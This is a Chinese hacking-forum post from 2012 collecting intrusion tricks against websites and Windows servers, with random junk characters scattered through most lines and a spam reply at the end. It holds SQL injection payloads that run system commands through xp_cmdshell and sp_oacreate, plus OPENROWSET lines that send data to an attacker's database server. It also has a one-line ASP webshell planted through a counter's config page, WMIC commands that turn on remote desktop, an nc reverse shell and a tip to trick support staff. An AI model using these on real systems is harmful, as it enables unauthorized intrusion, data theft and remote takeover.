找回密码
 立即注册
查看: 4060|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
8 ]  T3 k- B7 p) X# ]. K% e4 z7 j7 A

& t5 a2 h7 q1 A8 i4 b, h& ISA点数据库分离搞法+语句:- l" A6 P8 c& a3 W6 l$ ?& t: i

/ ]* {& Y: w! \& T, I3 ^7 Y8 \5 f2 V注射点不显错,执行下面三条语句页面都返回正常。  T; k% }* e# q9 y2 a3 J0 C
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
, Q$ I8 |8 l; [; Z5 U8 qand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
2 U- q% @% y9 T( y) {8 q8 [and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
% m5 M  c* c$ i. O$ w, C9 L5 Q可以列目录,判断系统为2000,web与数据库分离# y: ?2 y# n0 }. h# W4 Z
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
. P  _0 f: ]" Z# d/ p5 |# B! H- n  r在注射点上执行
" a4 o/ F& V, i, L, t& adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
! S4 |4 Z3 }4 |3 t( w页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP0 j5 w* x4 _! H$ E0 V) \
还有我用NC监听得其他端口都没有得到IP。
7 @. u6 F" B& C$ Z. N
* J( F% e$ y1 G( t& l$ |+ `通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
9 K5 F( Z2 t* v( v/ O'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
3 X$ \. m* l2 x- m2 P) P4 y2 Y+ G7 z1 P/ c% h* a: }6 a
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
+ H' ?! P  }. h8 V& B" F; ]
: h1 F) j* p4 D$ |& P# s现在就猜想是不是数据库是内网而且不能连外网。
7 F3 l; Z% u& R7 V' J# [3 s( s  J1 K- d  Q
; R+ W$ O! w  {# F4 ~
access导出txt文本代码
4 |" z  B+ o: M. |SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
5 H$ q1 w1 L8 }% K/ l  k& `9 j! E/ h. s$ A6 \
5 r. K" W; r1 J- Q7 m: n
% k# p' M" a, A4 Z; u1 K
自动跳转到指定网站代码头
. r; ?  d$ `, ~+ k; n<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>* ~6 q; \  u1 s; k* f

& I4 T& c6 _& o9 f5 H7 y; B
/ g3 E+ z( |* V+ z入侵java or jsp站点时默认配置文件路径:4 h$ J: a: [! W- c9 d2 B3 i7 T8 X
\web-inf\web.xml
& p1 U9 |+ m3 D( i% y% E7 wtomcat下的配置文件位置:
$ T0 ?% \% S& t- V; f# b- R\conf\server.xml            (前面加上tomcat路径)$ E# I6 ?) v; ~% E$ E9 [
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
/ |0 O- r) f# l; A. A4 q- E
. b* B9 }1 O' C0 M
0 K$ O1 J5 J2 s2 H
. u# `& \) }9 F2 A2 k# d' l检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:7 C5 ?. E7 }: }" v8 b. e
-1%23+ G; j2 m0 Y5 @' J
> % ~" i1 T  o, w$ d
<
5 Z5 a4 K8 A: q+ Z1'+or+'1'='1
0 v, t5 _. E3 u1 J) K; T& _id=8%bf
' o7 [- M4 N& |# _: d" }
  v) D8 |$ F8 W! N全新注入点检测试法:
* p6 ]) H: W, e; ^& c+ {, B在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。9 L- R* N+ c% O3 |! h

/ C7 ]9 q4 U& G) l2 T在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。$ C6 \4 F, F' d0 ^- p" @5 l
* d2 V) d- p% D/ f  Z
搜索型注入判断方法:
1 {, E( W3 Y" u) L; w/ U北京%' and '1'='1' and '%'='
4 }* E, V" @/ \3 _北京%' and '1'='2' and '%'='% r$ G; k+ O% t7 A" O4 s; h# w
" E/ ~7 ^1 V# s5 a* D# f
( T  _% ~! s/ M9 p! c6 J
COOKIES注入:3 |1 g  s. _; |1 s
* M7 C1 \; v- j7 }0 P1 a+ m
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
# {5 w+ t( w: V' ~
( p4 f% C9 A# d% s2000专业版查看本地登录用户命令:0 v! }1 G! A" X4 m
net config workstation
  ~5 t" x6 |5 e( E* {. T1 y$ ]; O. t% ^' A$ a5 t5 u) X
9 W4 P3 P- J& m# n( t2 X
2003下查看ipsec配置和默认防火墙配置命令:& |! O9 k( v4 A  c# \
netsh firewall show config3 A" L$ q" \7 `  d
netsh ipsec static show all
1 ~7 z4 a' ^  Z9 J  \  S" ~- o: h  Z8 B5 x7 K1 n# |9 M1 m
不指派指定策略命令:
& V2 L  ]1 y( @8 g# fnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
9 U& p+ I7 e6 J1 z  {# q- c& anetsh ipsec static show policy all  显示策略名0 `( l7 E* u; S! Y3 r2 k1 T
( X$ c$ Z$ h. {2 H/ ]- e
2 |; _. A& B/ w. A4 [/ A
猜管理员后台小技巧:) |1 G" Z# u0 Q# J
admin/left.asp
# v. h0 S) S% M9 n2 e' ^admin/main.asp7 S# E0 {( B7 b! D7 D. t- Y
admin/top.asp
6 |8 m' `* D) d1 A% O$ ?admin/admin.asp - L5 ^0 l/ |) G
会现出菜单导航,然后迅雷下载全部链接
, k5 A/ H/ R  {1 S4 |6 f
* U; m4 @8 B" Y" H; [3 ]4 }: g7 P3 a: K5 K
社会工程学:6 N$ ^; E2 J1 I( A
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人: A( {3 e+ q" m4 H9 ]
然后去骗客服
3 q7 J& s. J9 s" @; t, u  i* |
2 R1 f6 K7 O& h0 D% B. I  N1 h! i4 B% u! R, B- l) G9 k7 x
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: $ Q1 n  `2 o  m9 c$ V# d. r
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
0 l$ E1 y9 L+ R  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。) f. v* D. ^& Q9 v% G

; v) |) O1 p5 L* |$ z# Y; H
$ D9 N" Y; a% q8 u* u& I2 t4 S  t! T' q7 ~) m& c: h
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)2 \- T1 q. X# h! K+ V
4 h( [+ e5 U/ k( x
& I4 r2 s' Q8 [

6 u' G. o6 m+ y+ }) S( o' WCMD加密注册表位置
' m- \9 z, r4 @& ?) z% [- x! x(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
$ _: {1 ]4 a7 l5 qAutoRun$ s* ], r, E2 ?' I/ E9 `
  v6 H3 H% }) x) [/ g& M7 r
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor% O2 }* L( z5 e, S0 H0 D
AutoRun
" O5 ?7 \2 B, p9 m8 i1 q1 ^3 a3 w
' F) L  i$ Q, e5 F. D
3 m7 N: I2 ^) m5 h在找注入时搜索Hidden,把他改成test
/ w3 r( x  P* U' M. q' a! ], f9 y9 J% r
/ I1 D" W- }# G1 t7 X7 w/ i- ~
& j9 \% k) h4 A4 r1 W
mstsc /v:IP /console
# x  k1 x& m1 K' d( x+ Q' |2 J6 `
$ U: E  n" y$ P9 n7 ^! U8 K  Z0 e+ }" ~8 D6 g) l* r( U0 G+ B
一句话开3389:) f* U/ F/ f1 D2 K) m! V! z
% o  d- O7 b& X  |5 p- x5 f% r
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  % n7 ~/ i7 [* f  B2 g0 c
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
( N: z9 Y1 N- k  T- K) ^: u) S( u6 J/ j3 j
  F' y. L4 ^- R
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:$ E0 _. I6 r, p8 Q# r
Insert into admin(user,pwd) values('test','test')
2 g4 L; A0 M' Z/ s0 g; {
2 X. W$ p/ I4 c, s- j
! E/ v) k4 H* |NC反弹. ^  Q7 h; {  ]- D+ r
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
( }' z% h  n7 a% U然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
9 P  f8 C! t& S  V' {0 j/ r" J+ B5 g
- ]+ m0 t5 r1 h5 q3 a
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题' M: o' L( }/ J! v* x
0 [- P* P  \; s; [' }0 g4 h" h
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
9 R( B2 a1 c' e+ N% c例如:2 |8 ^: @+ m% r1 M& S8 l0 v
subst k: d:\www\ 用d盘www目录替代k盘: B3 k; T  X) F7 S# F2 N
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表